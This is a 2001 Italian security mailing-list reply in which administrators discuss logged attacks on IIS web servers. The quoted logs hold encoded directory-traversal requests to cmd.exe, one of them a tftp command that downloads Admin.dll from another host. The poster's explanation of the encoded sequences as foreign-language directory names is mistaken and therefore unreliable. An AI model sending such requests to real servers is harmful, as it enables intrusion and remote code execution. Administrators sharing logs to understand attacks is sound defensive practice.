Re: Un saluto e domandina

Ste wrote:

> Ciao a tutti, trovo ultimamente, sempre piu' spesso nei log, questa riga:
>
> oops_id oops_url oops_ip oops_date oops_durl
> 902190 151.4.121.7 24/09/2001 14.45.00 
> #?404;http://www/scripts/..S5c../winnt/system32/cmd.exe?/c tftp -i 
> 151.4.121.11 GET Admin.dll e:\Admin.dll
>
> che devo fare? il signor 151.4.121.7, esiste, è vero e posso torturarlo?
> grazie a chi mi da una rispostina
>
> Ciao
> Ste 


Mi trovo davanti ad un problema simile.

Nei log ho trovato:

2001-08-17 15:43:30 202.206.24.33 - 63.151.41.54 GET /winnt/system32/cmd.exe /c+dir 404 3396 66 16 HTTP/1.0 - - -
2001-08-17 15:43:30 202.206.24.33 - 63.151.41.54 GET /winnt/system32/cmd.exe /c+dir 404 3396 66 16 HTTP/1.0 - - -
2001-08-17 15:43:33 202.206.24.33 - 63.151.41.54 GET /scripts/..Á%pc../winnt/system32/cmd.exe /c+dir 500 0 66 0 HTTP/1.0 - - -
2001-08-17 15:43:33 202.206.24.33 - 63.151.41.54 GET /scripts/..À%9v../winnt/system32/cmd.exe /c+dir 500 0 66 0 HTTP/1.0 - - 


e via cosi'...

Il signor 202.206.24.33 e' un pc di una universita' cinese (un classico 
direi).

Quello che mi lascia interdetto sono quelle sigle dopo lo /script/:

..À%9v..

che a volte diventa

..øEUREUREUR¯..

e simili.

Secondo me, potrebbe darsi che chi e' venuto a farsi una passegiata, 
abbia provato a cercare directory con nomi in tabelle di caratteri non 
standard (come appunto quella cinese).

Ora, il problema secondo me e' pari a zero. Credo che anche se il 
signore riuscisse ad entrare, quello che tenta di fare (copiarsi il 
cmd.exe in una directory dove lui lo possa eseguire) sia un exploit 
conosciuto e anche patchato su questo server.

Secondo voi puo' essere un banale script-kiddy? Secondo me si... tanto 
piu' che cerca solo sul volume principale (C) e non si preoccupa di 
eventuali altri HD (tipo D, E, F...).


Grazie.
Luca

>




________________________________________________________
http://www.sikurezza.org - Italian Security Mailing List